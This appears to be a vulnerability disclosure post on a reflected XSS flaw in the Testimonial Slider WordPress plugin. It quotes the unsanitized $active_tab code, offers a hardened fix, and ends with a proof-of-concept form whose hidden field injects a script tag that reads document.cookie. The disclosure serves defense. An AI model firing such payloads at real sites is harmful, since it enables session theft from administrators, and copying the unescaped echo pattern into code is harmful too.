Reflected Cross-Site Scripting (XSS) Vulnerability in Testimonial Slider
In a post earlier today we mentioned coming across a report that the plugin Testimonial Slider had been removed from the Plugin Directory, and the cause of that. While doing a bit of checking on the plugin we found another minor vulnerability (and there could well be more, as the code we looked at is not securely written); we happened across this one while looking for something else.
On line 267 of the file /slider_versions/testimonial_1.php, the value of the variable $active_tab is output directly into a JavaScript context without being escaped:
jQuery("#slider_tabs").tabs({fx: { opacity: "toggle", duration: 300}, active: <?php echo $active_tab;?> }).addClass( "ui-tabs-vertical-left ui-helper-clearfix" );jQuery( "#slider_tabs li" ).removeClass( "ui-corner-top" ).addClass( "ui-corner-left" );
Several lines above that the variable can be defined:
if ( isset($_GET['page']) && ('testimonial-slider-admin' == $_GET['page']) && isset($_POST['active_tab']) ) $active_tab=$_POST['active_tab'];
If you request one of the plugin's admin pages and send a POST input "active_tab", the variable is set to the value of that POST input without being sanitized.
The lack of sanitization on input and escaping on output permits reflected cross-site scripting (XSS) to occur.
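For comparison, here is how the same tab-selection logic looks with the two missing controls, input sanitization and output escaping, added. This is an added example written for this post, not the plugin's own code; the nonce action name `testimonial_slider_tab` and field name `_ts_nonce` are assumed, and it is assumed to run inside the plugin's admin page callback on WordPress.

```php
<?php
// Added example (not the plugin's code): hardened version of the tab-index logic.
// Assumptions: runs inside the plugin's admin page callback; the form that posts
// active_tab has been rendered with wp_nonce_field( 'testimonial_slider_tab', '_ts_nonce' ).

$active_tab = 0; // safe default: first tab

// 1. Only accept the value when the request is on the expected admin page,
//    comes from a user allowed to manage settings, and carries a valid nonce
//    (check_admin_referer() stops the request itself if the nonce is bad).
if ( isset( $_GET['page'] ) && 'testimonial-slider-admin' === $_GET['page']
     && isset( $_POST['active_tab'] )
     && current_user_can( 'manage_options' )
     && check_admin_referer( 'testimonial_slider_tab', '_ts_nonce' ) ) {
    // A jQuery UI tab index is a non-negative integer, so coerce the input to
    // exactly that type. Anything like "</script><script>..." becomes 0.
    $active_tab = absint( wp_unslash( $_POST['active_tab'] ) );
}
?>
<script>
jQuery("#slider_tabs").tabs({
    fx: { opacity: "toggle", duration: 300 },
    // 2. Encode for a JavaScript context instead of echoing raw PHP output.
    //    absint() already guarantees a plain integer here; the JSON_HEX_TAG and
    //    JSON_HEX_AMP flags matter when a string is emitted this way, because a
    //    plain JSON string can still contain "</script>" and close the block.
    active: <?php echo wp_json_encode( $active_tab, JSON_HEX_TAG | JSON_HEX_AMP ); ?>
}).addClass( "ui-tabs-vertical-left ui-helper-clearfix" );
jQuery( "#slider_tabs li" ).removeClass( "ui-corner-top" ).addClass( "ui-corner-left" );
</script>
```

The key point is that the original code trusted a POST value both on the way in (no type check) and on the way out (no escaping for the script context); either control alone would have blocked the payload shown below, and the nonce check removes the cross-site trigger.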
Proof of Concept
The following proof of concept will cause any available cookies to be shown in an alert box when logged in to WordPress as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=testimonial-slider-admin" method="POST">
<input type="hidden" name="active_tab" value='</script><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>